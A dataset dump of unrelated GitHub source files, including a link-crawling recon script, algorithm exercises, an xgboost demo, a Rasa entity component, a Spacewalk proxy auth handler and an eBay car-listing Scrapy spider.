links.add(f'{url}/{link.get(\"href\")}')\r\n\r\n return links\r\n\r\n# Função que verifica se os links encontrados estão dentro do escopo\r\ndef verifica_links(links):\r\n for i in links:\r\n if i in noescopo:\r\n continue\r\n\r\n if args.target not in i:\r\n fora.add(i)\r\n continue\r\n\r\n noescopo.add(i)\r\n print(i)\r\n\r\n# Menu de ajuda\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('-q', '--quiet',\r\n action='store_true',\r\n dest='quiet',\r\n help='Suppress Output'\r\n )\r\nparser.add_argument('target',\r\n help='Target url'\r\n )\r\nparser.add_argument('-d',\r\n dest='deep',\r\n help='Deeping level for crawler (default: 0)'\r\n )\r\nparser.add_argument('--random-agent',\r\n action='store_true',\r\n dest='random_agent',\r\n help='Random user agent for requests (default: CrawAu)'\r\n )\r\nparser.add_argument('-o', \r\n dest='file_name',\r\n help='File to save the result'\r\n )\r\nparser.add_argument('--no-robots',\r\n action='store_true',\r\n dest='norobots',\r\n help='Not look for robots.txt (default: no)'\r\n )\r\nparser.add_argument('--header',\r\n dest='header',\r\n help='header key:value (Ex: \"Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l\")'\r\n ) \r\nargs = parser.parse_args()\r\n\r\nfile = args.file_name\r\ndeep = args.deep\r\n\r\nif \"http\" not in args.target:\r\n url = f'http://{args.target}'\r\nelse:\r\n url = args.target\r\n\r\nif not args.header:\r\n if not args.random_agent:\r\n headers = {'User-Agent': 'CrawAu'}\r\n else:\r\n headers = {'User-Agent': useragent.random}\r\nelse:\r\n h = args.header.split(\":\")\r\n if not args.random_agent:\r\n headers = {'User-Agent': 'CrawAu', h[0]: h[1].lstrip()}\r\n else:\r\n headers = {'User-Agent': useragent.random, h[0]: h[1].lstrip()}\r\n\r\ntry:\r\n r = requests.get(url, headers=headers)\r\nexcept:\r\n error(f'Não é possível se conectar a {args.target}') \r\n\r\nif not args.quiet:\r\n print(banner.banner)\r\n print()\r\n if args.header:\r\n print(f'[*] Headers: {args.header}')\r\n if args.random_agent:\r\n print(f'[*] User-Agent: {useragent.random}')\r\n print(f'[*] Conectando a {args.target}')\r\n print(f'{G}[+] Status Code {r.status_code}{END}')\r\n try:\r\n servidor = r.headers['Server']\r\n print(f\"{G}[+] Servidor: {servidor}{END}\")\r\n except:\r\n pass\r\n if not args.norobots:\r\n print('[*] Verificando robots.txt')\r\n verifica_arquivo(url,\"robots.txt\")\r\n print()\r\n print('[*] Extraindo links presentes na página')\r\nelse:\r\n if not args.norobots:\r\n verifica_arquivo(url,\"robots.txt\",1)\r\n\r\nif not deep:\r\n links = pega_links(url)\r\n print()\r\n verifica_links(links)\r\nelse:\r\n if not args.quiet:\r\n print(f'[*] Profundidade {deep}')\r\n print() \r\n \r\n links = pega_links(url)\r\n verifica_links(links)\r\n \r\n # Loop responsável por entrar nos links e buscar novos links\r\n for n in range(0,int(deep)):\r\n novo = noescopo - verifica\r\n verifica = noescopo.copy()\r\n for i in novo:\r\n links = pega_links(i)\r\n verifica_links(links)\r\n\r\nif len(noescopo) == 0:\r\n print(f\"{R}[-] Nada encontrado!{END}\")\r\n\r\n# Retorna os links que aparentemente estão fora do escopo\r\n# Necessário para validar se realmente está fora do escopo\r\nif not args.quiet:\r\n print()\r\n print(\"[*] Encontrados mas possivelmente fora do escopo:\")\r\n print()\r\n print(*fora, sep='\\n')\r\n print()\r\n\r\n# Salva os links do escopo em um arquivo\r\nif args.file_name:\r\n with open(file, 'w') as arquivo:\r\n for l in noescopo:\r\n arquivo.write(l+'\\n')\r\n","repo_name":"SQU4NCH/CrawAu","sub_path":"crawau.py","file_name":"crawau.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"12817372557","text":"import sys\nfrom itertools import combinations\n\n\ndef solve():\n global empties, ans\n\n empty_coords = list(combinations(empties, 3))\n\n for coords in empty_coords:\n arrange(coords)\n if can_hide():\n ans = 'YES'\n return\n de_arrange(coords)\n\n\ndef can_hide():\n global board, teachers, ds\n\n def valid(x, y):\n global n\n return 0 <= x < n and 0 <= y < n\n\n for tx, ty in teachers:\n for dx, dy in ds:\n nx, ny = tx, ty\n\n while True:\n nx, ny = nx+dx, ny+dy\n\n if not valid(nx, ny):\n break\n\n if board[nx][ny] == 'O' or board[nx][ny] == 'T':\n break\n\n if board[nx][ny] == 'S':\n return False\n\n return True\n\n\ndef arrange(coords):\n global board\n for x, y in coords:\n board[x][y] = 'O'\n\n\ndef de_arrange(coords):\n global board\n for x, y in coords:\n board[x][y] = 'X'\n\n\ndef find_points():\n global board, n, teachers, empties\n\n teachers = []\n for i in range(n):\n for j in range(n):\n if board[i][j] == 'T':\n teachers.append([i, j])\n elif board[i][j] == 'X':\n empties.append([i, j])\n\n return teachers\n\n\nds = [[-1, 0], [1, 0], [0, -1], [0, 1]]\nn = int(sys.stdin.readline().strip())\nboard = []\nfor _ in range(n):\n board.append(list(sys.stdin.readline().strip().split(' ')))\n\nteachers = []\nempties = []\nfind_points()\nans = \"NO\"\nsolve()\nprint(ans)\n\n\n# 5\n# X X X X X\n# X X X X X\n# X X T X X\n# X X X X X\n# X X X S X","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/brute_force/18428.감시 피하기.py","file_name":"18428.감시 피하기.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"14100023561","text":"#análise de nota e média\n\nnota1 = float(input('Digite a primeira nota: '))\nnota2 = float(input('Digite a segunda nota: '))\nmedia = (nota1 + nota2) / 2\nif media < 5.0:\n print('Média {} - REPROVADO'.format(media))\nelif media >= 5.0 and media <= 6.9: #outra forma de escrever o código: 7 > media >= 5\n print('Média {} - RECUPERAÇÃO'.format(media))\nelse:\n print('Média {} - APROVADO'.format(media))","repo_name":"tabatagloria/curso_video_Python","sub_path":"Mundo_2-Estruturas_de_Controle/desafio_40.py","file_name":"desafio_40.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19162267401","text":"import xgboost as xgb\nimport matplotlib.pyplot as plt\n\ndtrain = xgb.DMatrix(\"../data/agaricus.txt.train\")\ndtest = xgb.DMatrix(\"../data/agaricus.txt.test\")\n'''\nmax_depth: 树的最大深度。缺省值为6,取值范围为:[1,∞]\neta:为了防止过拟合,更新过程中用到的收缩步长。在每次提升计算之后,算法会直接获得新特征的权重。 \neta通过缩减特征的权重使提升计算过程更加保守。缺省值为0.3,取值范围为:[0,1]\nsilent:取0时表示打印出运行时信息,取1时表示以缄默方式运行,不打印运行时信息。缺省值为0\nobjective: 定义学习任务及相应的学习目标,“binary:logistic” 表示二分类的逻辑回归问题,输出为概率。\n'''\nparam = {'max_depth': 2, 'eta': 1, 'silent': 1, 'objective': 'binary:logistic'}\nparam['eval_metric'] = 'auc'\n\n# 设置boosting迭代计算次数\nnum_round = 10\nevallist = [(dtest, 'eval'), (dtrain, 'train')]\nbst = xgb.train(param, dtrain, num_round, evallist)\npreds = bst.predict(dtest)\nprint(preds)\nlabels = dtest.get_label()\nprint('error=%f' % (sum(1 for i in range(len(preds)) if int(preds[i] > 0.5) != labels[i]) / float(len(preds))))\n# ax=xgb.plot_importance(bst)\n# plt.show()\n# ax=xgb.plot_tree(bst, num_trees=2)\n# plt.show()\n","repo_name":"zzqcst/python-practice","sub_path":"src/xgboostdemo.py","file_name":"xgboostdemo.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5814759177","text":"class Solution(object):\n def complexNumberMultiply(self, a, b):\n \"\"\"\n :type a: str\n :type b: str\n :rtype: str\n \"\"\"\n a = a.split('+')\n b = b.split('+')\n first = int(a[0]) * int(b[0]) - int(a[1][:-1]) * int(b[1][:-1])\n second = int(a[0]) * int(b[1][:-1]) + int(b[0]) * int(a[1][:-1])\n return str(first) + '+' + str(second) + 'i'\n","repo_name":"shaniavina/Leetcode_Python","sub_path":"complex_number_multiplication.py","file_name":"complex_number_multiplication.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9519631619","text":"import os\nimport typing\nfrom typing import Any, Dict, List, Optional, Text, Type\n\nimport rasa.shared.utils.io\nfrom fuzzywuzzy import process\nfrom rasa.nlu.components import Component\nfrom rasa.nlu.config import RasaNLUModelConfig\nfrom rasa.nlu.extractors.extractor import EntityExtractor\nfrom rasa.nlu.utils import write_json_to_file\nfrom rasa.shared.nlu.constants import ENTITIES\nfrom rasa.shared.nlu.training_data.message import Message\nfrom rasa.shared.nlu.training_data.training_data import TrainingData\n\nif typing.TYPE_CHECKING:\n from rasa.nlu.model import Metadata\n\n# subclass EntityExtractor to skip featurize_message() in rasa.nlu.model.Interpreter\nclass EntityTypoFixer(EntityExtractor):\n \"\"\"A new component\"\"\"\n\n # Which components are required by this component.\n # Listed components should appear before the component itself in the pipeline.\n @classmethod\n def required_components(cls) -> List[Type[Component]]:\n \"\"\"Specify which components need to be present in the pipeline.\"\"\"\n\n return [EntityExtractor]\n\n # Defines the default configuration parameters of a component\n # these values can be overwritten in the pipeline configuration\n # of the model. The component should choose sensible defaults\n # and should be able to create reasonable results with the defaults.\n defaults = {\"score_cutoff\": 80}\n\n # Defines what language(s) this component can handle.\n # This attribute is designed for instance method: `can_handle_language`.\n # Default value is None which means it can handle all languages.\n # This is an important feature for backwards compatibility of components.\n supported_language_list = None\n\n # Defines what language(s) this component can NOT handle.\n # This attribute is designed for instance method: `can_handle_language`.\n # Default value is None which means it can handle all languages.\n # This is an important feature for backwards compatibility of components.\n not_supported_language_list = None\n\n def __init__(\n self,\n component_config: Optional[Dict[Text, Any]] = None,\n entities: Optional[List[Text]] = None,\n ) -> None:\n super().__init__(component_config)\n self.entities = entities if entities else []\n self.score_cutoff = component_config.get(\n \"score_cutoff\", self.defaults[\"score_cutoff\"]\n )\n\n def train(\n self,\n training_data: TrainingData,\n config: Optional[RasaNLUModelConfig] = None,\n **kwargs: Any,\n ) -> None:\n \"\"\"Train this component.\n\n This is the components chance to train itself provided\n with the training data. The component can rely on\n any context attribute to be present, that gets created\n by a call to :meth:`components.Component.pipeline_init`\n of ANY component and\n on any context attributes created by a call to\n :meth:`components.Component.train`\n of components previous to this one.\"\"\"\n self.entities = list(training_data.entity_synonyms.keys())\n\n def process(self, message: Message, **kwargs: Any) -> None:\n \"\"\"Process an incoming message.\n\n This is the components chance to process an incoming\n message. The component can rely on\n any context attribute to be present, that gets created\n by a call to :meth:`components.Component.pipeline_init`\n of ANY component and\n on any context attributes created by a call to\n :meth:`components.Component.process`\n of components previous to this one.\"\"\"\n extracted_entities = message.get(ENTITIES, [])\n self.fix_entity_typo(extracted_entities)\n message.set(ENTITIES, extracted_entities, add_to_output=True)\n\n def persist(self, file_name: Text, model_dir: Text) -> Optional[Dict[Text, Any]]:\n \"\"\"Persist this component to disk for future loading.\"\"\"\n\n if self.entities:\n file_name = file_name + \".json\"\n entity_file = os.path.join(model_dir, file_name)\n write_json_to_file(entity_file, self.entities)\n\n return {\"file\": file_name}\n else:\n return {\"file\": None}\n\n def fix_entity_typo(self, entities: List[Dict[Text, Any]]) -> None:\n for entity in entities:\n entity_value = str(entity[\"value\"])\n fuzzy_match = process.extractOne(\n entity_value, self.entities, score_cutoff=self.score_cutoff\n )\n if fuzzy_match:\n fuzzy_entity = fuzzy_match[0]\n if fuzzy_entity != entity_value:\n entity[\"value\"] = fuzzy_entity\n self.add_processor_name(entity)\n\n def add_processor_name(self, entity: Dict[Text, Any]) -> Dict[Text, Any]:\n if \"processors\" in entity:\n entity[\"processors\"].append(self.name)\n else:\n entity[\"processors\"] = [self.name]\n\n return entity\n\n @classmethod\n def load(\n cls,\n meta: Dict[Text, Any],\n model_dir: Text,\n model_metadata: Optional[\"Metadata\"] = None,\n cached_component: Optional[\"Component\"] = None,\n **kwargs: Any,\n ) -> \"Component\":\n \"\"\"Load this component from file.\"\"\"\n\n file_name = meta.get(\"file\")\n if not file_name:\n entities = None\n return cls(meta, entities)\n\n entities_file = os.path.join(model_dir, file_name)\n if os.path.isfile(entities_file):\n entities = rasa.shared.utils.io.read_json_file(entities_file)\n else:\n entities = None\n return cls(meta, entities)\n","repo_name":"hsm207/rasa_fuzzy","sub_path":"addons/my_custom_components.py","file_name":"my_custom_components.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"37818937243","text":"import time\n\n# common module imports\nfrom spacewalk.common import CFG, rhnFault, rhnFlags, log_debug, log_error, UserDictCase\nfrom spacewalk.common.rhnTranslate import _\n\n# local module imports\nfrom spacewalk.server.rhnLib import computeSignature\nfrom spacewalk.server.rhnHandler import rhnHandler\nfrom spacewalk.server import rhnServer, rhnSQL, apacheAuth, rhnPackage\n\n# a class that provides additional authentication support for the\n# proxy functions\nclass rhnProxyHandler(rhnHandler):\n def __init__(self):\n rhnHandler.__init__(self)\n\n def auth_system(self, system_id):\n \"\"\" System authentication. We override the standard function because\n we need to check additionally if this system_id is entitled for\n proxy functionality.\n \"\"\"\n log_debug(3) \n server = rhnHandler.auth_system(self, system_id)\n # if it did not blow up, we have a valid server. Check proxy\n # entitlement.\n # XXX: this needs to be moved out of the rhnServer module,\n # possibly in here\n h = rhnSQL.prepare(\"\"\"\n select 1\n from rhnProxyInfo pi\n where pi.server_id = :server_id\n \"\"\")\n h.execute(server_id = self.server_id)\n row = h.fetchone_dict()\n if not row:\n # we require entitlement for this functionality\n log_error(\"Server not entitled for Proxy\", self.server_id)\n raise rhnFault(1002, _(\n 'RHN Proxy service not enabled for server profile: \"%s\"')\n % server.server[\"name\"])\n # we're fine...\n return server\n\n def auth_client(self, token):\n \"\"\" Authenticate a system based on the same authentication tokens\n the client is sending for GET requests\n \"\"\"\n log_debug(3)\n # Build a UserDictCase out of the token\n dict = UserDictCase(token)\n # Set rhnFlags so that we can piggyback on apacheAuth's auth_client\n rhnFlags.set('AUTH_SESSION_TOKEN', dict)\n\n # XXX To clean up apacheAuth.auth_client's logging, this is not about\n # GET requests\n result = apacheAuth.auth_client()\n\n if not result:\n raise rhnFault(33, _(\"Invalid session key\"))\n\n log_debug(4, \"Client auth OK\")\n # We checked it already, so we're sure it's there\n client_id = dict['X-RHN-Server-Id']\n \n server = rhnServer.search(client_id)\n if not server:\n raise rhnFault(8, _(\"This server ID no longer exists\"))\n # XXX: should we check if the username still has access to it? \n # probably not, because there is no known good way we can\n # update the server system_id on the client side when\n # permissions change... Damn it. --gafton\n self.server = server\n self.server_id = client_id\n self.user = dict['X-RHN-Auth-User-Id']\n return server\n\n \nclass Proxy(rhnProxyHandler):\n \"\"\" this is the XML-RPC receiver for proxy calls \"\"\"\n def __init__(self):\n log_debug(3)\n rhnProxyHandler.__init__(self)\n self.functions.append('package_source_in_channel')\n self.functions.append('login')\n\n def package_source_in_channel(self, package, channel, auth_token):\n \"\"\" Validates the client request for a source package download \"\"\"\n log_debug(3, package, channel)\n server = self.auth_client(auth_token)\n return rhnPackage.package_source_in_channel(self.server_id, \n package, channel)\n\n def login(self, system_id):\n \"\"\" Login routine for the proxy\n\n Return a formatted string of session token information as regards\n an RHN Proxy. Also sets this information in the headers.\n\n NOTE: design description for the auth token format and how it is\n is used is well documented in the proxy/broker/rhnProxyAuth.py\n code.\n \"\"\"\n log_debug(5, system_id)\n # Authenticate. We need the user record to be able to generate\n # auth tokens\n self.load_user = 1 \n self.auth_system(system_id)\n # log the entry\n log_debug(1, self.server_id)\n rhnServerTime = str(time.time())\n expireOffset = str(CFG.PROXY_AUTH_TIMEOUT)\n signature = computeSignature(CFG.SECRET_KEY, self.server_id, self.user,\n rhnServerTime, expireOffset)\n \n token = '%s:%s:%s:%s:%s' % (self.server_id, self.user, rhnServerTime,\n expireOffset, signature)\n\n # NOTE: for RHN Proxies of version 3.1+ tokens are passed up in a\n # multi-valued header with HOSTNAME tagged onto the end of the\n # token, so, it looks something like this:\n # x-rhn-proxy-auth: 'TOKEN1:HOSTNAME1,TOKEN2:HOSTNAME2'\n # This note is only that -- a \"heads up\" -- in case anyone gets\n # confused.\n\n # Push this value into the headers so that the proxy can\n # intercept and cache it without parsing the xmlrpc.\n transport = rhnFlags.get('outputTransportOptions')\n transport['X-RHN-Action'] = 'login'\n transport['X-RHN-Proxy-Auth'] = token\n return token\n\n\n#-----------------------------------------------------------------------------\n\n","repo_name":"colloquium/spacewalk","sub_path":"backend/server/handlers/xmlrpc/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"36227032911","text":"# Standard library\nimport random\nimport pandas as pd\n\n# Third-party libraries\nfrom matplotlib import pyplot as plt\nfrom matplotlib.cm import Dark2\n#https://matplotlib.org/stable/tutorials/colors/colormaps.html\n\n# Custom modules\nfrom thread_plot import thread_plot\n\n\n\ndf=pd.read_csv('cluster_ids_jaccard_exp0_k3_simulated_set6_seed1.csv')\nprint(df.head())\n\ndf_clust0=df.loc[df['cluster']==0]\nprint(len(df_clust0))\n\nchoice=list(df_clust0['String'].unique())\nchoices=''.join(choice)\n#print(choices)\n\nchoices2=[]\n\nfor i in choices:\n if i not in set(choices2):\n choices2.append(i)\n\nchoices3=''.join(choices2)\nprint(choices3)\n\nif __name__ == '__main__':\n choices = choices3\n data = list(df_clust0['String'])\n\n # We need to make a color choice for each letter in the sequence\n cm = plt.get_cmap('tab20')\n colors = dict([(choices[i], cm(1.*i/len(choices))) for i in range(len(choices))])\n\n # Make the plot\n fig, ax = plt.subplots(1)\n thread_plot(ax, colors, data)\n\n # Since we're using patches (rectangles), Matplotlib doesn't know about our legend, so we have\n # to generate some fake data to force the legend to appear properly\n markers = [plt.Line2D([0,0],[0,0],color=color, marker='o', linestyle='') for color in colors.values()]\n plt.legend(markers, colors.keys(), numpoints=1, bbox_to_anchor=(1.05, 1))\n plt.tight_layout()\n\n plt.show()\n\n","repo_name":"laurenleesc/thread_plot","sub_path":"demo_realdata.py","file_name":"demo_realdata.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"4857810510","text":"class Solution:\n def employeeFreeTime(self, schedule):\n\n arr = []\n for employee in schedule:\n arr += [interval for interval in employee]\n\n arr.sort(key=lambda x: x.start)\n\n free_time = []\n\n end = arr[0].end\n\n for i in range(1, len(arr)):\n\n if end < arr[i].start:\n free_time.append(Interval(end, arr[i].start))\n end = arr[i].end\n\n elif arr[i].end > end:\n end = arr[i].end\n\n return free_time","repo_name":"sindhura-pv/programming-practice","sub_path":"heap/hard/employee-free-time.py","file_name":"employee-free-time.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"18412811875","text":"# import scrapy\n\n\n# class EbaySpiderSpider(scrapy.Spider):\n# name = 'ebay_spider'\n# allowed_domains = ['example.com']\n# start_urls = ['http://example.com/']\n\n# def parse(self, response):\n# pass\n\n\nfrom scrapy.crawler import CrawlerProcess\nimport scrapy\nimport json\nfrom scrapy.http import FormRequest\nfrom scrapy.http.headers import Headers\nfrom urllib.parse import urlencode\nfrom scrapy import Request\nfrom scrapy.http.cookies import CookieJar\nfrom scrapy.shell import inspect_response\n# from urlparse import urlparse, parse_qs\nfrom urllib.parse import urlparse, parse_qs\nimport math\n\nfrom scrapy.spidermiddlewares.httperror import HttpError\nfrom twisted.internet.error import DNSLookupError\nfrom twisted.internet.error import TimeoutError, TCPTimedOutError\n\nclass BlogSpider(scrapy.Spider):\n COOKIES_ENABLED = True\n COOKIES_DEBUG = False\n name = 'ebay_spider'\n # start_urls = ['http://www.ebay.com/sch/Cars-Trucks/6001/i.html']\n start_urls = [\n 'http://www.ebay.com/sch/Cars-Trucks/6001/i.html?_dcat=6001&_dmpt=US_Cars_Trucks&Model%2520Year=1901%7C1902%7C1903%7C1904%7C1905%7C1906%7C1907%7C1908%7C1909%7C1910%7C1911%7C1912%7C1913%7C1914%7C1915%7C1916%7C1917%7C1918%7C1919%7C1920%7C1921%7C1922%7C1923%7C1924%7C1925%7C1926%7C1927%7C1928%7C1929%7C1930%7C1931%7C1932%7C1933%7C1934%7C1935%7C1936%7C1937%7C1938%7C1939%7C1940%7C1941%7C1942%7C1943%7C1944%7C1945%7C1946%7C1947%7C1948%7C1949%7C1950%7C1951%7C1952%7C1953%7C1954%7C1955%7C1956%7C1957%7C1958%7C1959%7C1960%7C1961%7C1962%7C1963%7C1964%7C1965%7C1966%7C1967%7C1968%7C1969%7C1970%7C1971%7C1972%7C1973%7C1974%7C1975%7C1976%7C1977%7C1978%7C1979%7C1980%7C1981%7C1982%7C1983%7C1984%7C1985%7C1986%7C1987']\n\n def __init__(self, brand=None, model=None, start_year=None, end_year=None, start_price=None, end_price=None,\n mileage=None, interior=None, exterior=None, page_number=None, *args, **kwargs):\n\n f = open(\"./ebay_params.txt\", \"w\")\n qs = \"brand={brand}, model={model}, start_year={start_year}, end_year={end_year}, \" \\\n \"start_price={start_price}, end_price={end_price}, mileage={mileage}, \" \\\n \"interior={interior}, exterior={exterior}, page_number={page_number}\" \\\n .format(brand=brand, model=model, start_year=start_year, end_year=end_year,\n start_price=start_price, end_price=end_price, mileage=mileage,\n interior=interior, exterior=exterior, page_number=page_number)\n\n self.f = open(\"./ebay_debugger.txt\", \"a\")\n super(BlogSpider, self).__init__(*args, **kwargs)\n year = \"\"\n try:\n if start_year and end_year:\n for i in range(int(start_year), int(end_year) + 1, 1):\n if i == int(end_year):\n year = year + str(i)\n else:\n year = year + str(i) + '%7C'\n elif start_year and not end_year:\n year = start_year\n elif end_year and not start_year:\n year = end_year\n self.f.write('Start.')\n if mileage:\n mileage = mileage.replace(',', '%252C')\n # url= 'http://www.ebay.com/sch/Cars-Trucks/6001/i.html?rt=nc&LH_BIN=1&_dcat=6001&_dmpt=US_Cars_Trucks&makeval='+brand+'&modelval='+model+'&_nkw='+brand+' '+model+'&Model%2520Year='+year+'&rt=nc&_mPrRngCbx=1&_udlo='+start_price+'&_udhi='+end_price+'&Vehicle%2520Mileage=Less%2520than%2520'+mileage+'%2520miles'+'&Exterior%2520Color='+exterior+'&Interior%2520Color='+interior+'&_pgn='+page_number+'&_ipg=50'\n url = 'http://www.ebay.com/sch/Cars-Trucks/6001/i.html?_dcat=6001&_dmpt=US_Cars_Trucks&makeval=' + brand + '&modelval=' + model + '&_nkw=' + brand + ' ' + model + '&Model%2520Year=' + year + '&rt=nc&_mPrRngCbx=1&_udlo=' + start_price + '&_udhi=' + end_price + '&Vehicle%2520Mileage=Less%2520than%2520' + mileage + '%2520miles' + '&Exterior%2520Color=' + exterior + '&Interior%2520Color=' + interior + '&_pgn=' + page_number + '&_ipg=50'\n\n # url = 'https://www.ebay.com/sch/Cars-Trucks/6001/i.html?_dcat=6001&_dmpt=US_Cars_Trucks&' \\\n # 'makeval={make}&_fosrp=1'.format(make=brand)\n\n\n # self.start_urls = ['http://www.example.com/categories/%s' % category]\n f.write(\"%s \\n %s\" % (qs, url))\n self.start_urls = [url]\n except Exception as e:\n f = open(\"./ebay_exception1.txt\", \"w\")\n f.write(str(e))\n\n def start_requests(self):\n for u in self.start_urls:\n yield scrapy.Request(u, callback=self.parse,\n errback=self.errback_httpbin,\n dont_filter=True)\n\n def errback_httpbin(self, failure):\n f = open(\"./ebay_httpfail.txt\", \"w\")\n # f.write(repr(failure))\n output = \"URL: {url} \\n failure: {failure}\".format(url=self.start_urls[0], failure=repr(failure))\n\n if failure.check(HttpError):\n output += 'HttpError occurred'\n\n elif failure.check(DNSLookupError):\n output += 'DNSLookupError occurred'\n\n elif failure.check(TimeoutError, TCPTimedOutError):\n output += 'TimeoutError occurred'\n output += \"\\n statusCode: {status}\".format(status=failure.value.response.status )\n f.write(output)\n\n def parse(self, response):\n try:\n global total_results\n global page_count\n self.f.write('Step 1')\n #\tinspect_response(response,self)\n self.f.write(response.body)\n #self.f.write(response.__dict__)\n if response.css('span.listingscnt ::text'):\n self.f.write('Step 2')\n total_results = response.css('span.listingscnt ::text').extract_first()\n total_results = total_results.replace(\",\", \"\")\n total_results = total_results.replace(\"listings\", \"\")\n total_results = total_results.strip()\n pages = float(total_results) / 50\n page_count = math.ceil(pages)\n self.logger.warning(total_results + \" resultats\")\n elif response.css('span.rcnt ::text'):\n self.f.write('Step 3')\n total_results = response.css('span.rcnt ::text').extract_first()\n total_results = total_results.replace(\",\", \"\")\n total_results = total_results.replace(\"listings\", \"\")\n total_results = total_results.strip()\n pages = float(total_results) / 50\n page_count = math.ceil(pages)\n self.logger.warning(total_results + \" resultats\")\n elif response.css('h1.srp-controls__count-heading ::text'):\n self.f.write('Step 4')\n total_results = response.css('h1.srp-controls__count-heading ::text').extract_first()\n total_results = total_results.replace(\",\", \"\")\n total_results = total_results.replace(\" results\", \"\")\n total_results = total_results.strip()\n pages = float(total_results) / 50\n page_count = math.ceil(pages)\n self.logger.warning(total_results + \" resultats\")\n\n else:\n self.f.write('Step 5')\n self.logger.warning(\"absence de span.listingscnt et span.rcnt\")\n total_results = ''\n page_count = ''\n\n for res in response.css('li.sresult.lvresult.clearfix.li'):\n if res.css('ul.lvprices li:nth-child(2).lvformat span ::text'):\n bids = res.css('ul.lvprices li:nth-child(2).lvformat span ::text').extract_first()\n bids = bids.split(\" \")\n else:\n bids = []\n if res.css('ul div.tsp'):\n best = res.css('ul div.tsp + li + li span ::text').extract_first()\n best = best.strip()\n if best == \"Buy It Now\":\n scrap = True\n else:\n scrap = False\n if len(bids) > 1:\n if bids[1] == \"bids\" or bids[1] == \"bid\" and scrap == False:\n pass\n else:\n href = res.css('div div a::attr(href)').extract_first()\n yield scrapy.Request(response.urljoin(href), callback=self.product_details)\n else:\n href = res.css('div div a::attr(href)').extract_first()\n yield scrapy.Request(response.urljoin(href), callback=self.product_details)\n next_page = response.css('tr td.pages a.curr + a ::attr(href)').extract_first()\n self.f.write('Step 6')\n except Exception as e:\n f = open(\"./ebay_exception.txt\", \"w\")\n f.write(str(e))\n # if next_page:\n # yield scrapy.Request(response.urljoin(next_page), callback=self.parse)\n\n def product_details(self, response):\n try:\n title = response.css('.it-ttl ::text').extract()\n self.f.write('Step 7')\n title = title[1]\n if title:\n str_title = title.split(\" \")\n else:\n str_title = \" \"\n brand = str_title[1]\n if len(str_title) > 2:\n model = str_title[2]\n else:\n model = \" \"\n price = response.css('div#vi-mskumap-none span ::text').extract_first()\n price = price.replace(\"US $\", \"\")\n price = price.replace(\",\", \"\")\n src = []\n if response.css('div#vi_main_img_fs ul.lst.icon li'):\n for res in response.css('ul.lst.icon li'):\n img = res.css('td.tdThumb div img::attr(src)').extract_first()\n img = img.replace(\"64.\", \"500.\")\n src.append(img)\n else:\n img = response.css('div#mainImgHldr img:nth-child(2)::attr(src)').extract_first()\n src.append(img)\n\n specs = {}\n for res in response.css('div.itemAttr div table tr'):\n\n key = res.css('td:nth-child(1) ::text').extract_first()\n if res.css('td:nth-child(2) h2'):\n value = res.css('td:nth-child(2) h2 ::text').extract_first()\n else:\n value = res.css('td:nth-child(2) span ::text').extract_first()\n\n value = res.css('td:nth-child(2) span ::text').extract_first()\n key1 = res.css('td:nth-child(3) ::text').extract_first()\n if res.css('td:nth-child(4) h2'):\n value1 = res.css('td:nth-child(4) h2 ::text').extract_first()\n else:\n value1 = res.css('td:nth-child(4) span ::text').extract_first()\n # value1=res.css('td:nth-child(4) span ::text').extract_first()\n if value is not None:\n value = value.strip()\n if key is not None:\n key = key.replace(\":\", \"\")\n key = key.strip()\n\n if value1 is not None:\n value1 = value1.strip()\n if key1 is not None:\n key1 = key1.replace(\":\", \"\")\n key1 = key1.strip()\n if key == \"Model\":\n if value is None:\n value = res.css('td:nth-child(2) h2 ::text').extract_first()\n\n if key is not None:\n specs[key] = value\n if key1 is not None:\n specs[key1] = value1\n if key == \"Year\":\n year = value\n if key1 == \"Year\":\n year = value1\n if key == \"Mileage\":\n mileage = value\n if key1 == \"Mileage\":\n mileage = value1\n mileage = mileage.replace(\",\", \"\")\n mileage = mileage.strip()\n if mileage:\n miles = float(mileage)\n conv_fac = 1.609\n kilometers = miles * conv_fac\n else:\n kilometers = \"\"\n parameters = parse_qs(urlparse(response.url).query)\n try:\n reference_id = parameters['item']\n reference_id = reference_id[0]\n except Exception as e:\n parames = response.url.split(\"/\")\n ref_param = parames[len(parames) - 1]\n reference_id = ref_param.split('?')\n reference_id = reference_id[0]\n # if not total_resultes:\n # total_resultes=''\n # yield {\"src\":src,\"href\":href,\"title\":title,\"price\":price,\"year\":year.strip(),\"brand\":brand,\"model\":model}\n self.f.write(\"\\n %s\" %title)\n yield {\"src\": src, \"href\": response.url, \"specs\": specs, \"title\": title, \"price\": price, \"brand\": brand,\n \"model\": model, \"year\": year, \"reference_id\": reference_id, \"mileage\": mileage, \"kilometers\": kilometers,\n \"description\": \"\", \"total_results\": total_results, \"page_count\": page_count}\n except Exception as e:\n f = open(\"./ebay_exception.txt\", \"w\")\n f.write(str(e))\n\n\nif __name__ == \"__main__\":\n process = CrawlerProcess()\n process.crawl(BlogSpider)\n process.start()\n","repo_name":"tripaak/webscrapping","sub_path":"ebay/ebay/spiders/ebay_spider copy.py","file_name":"ebay_spider 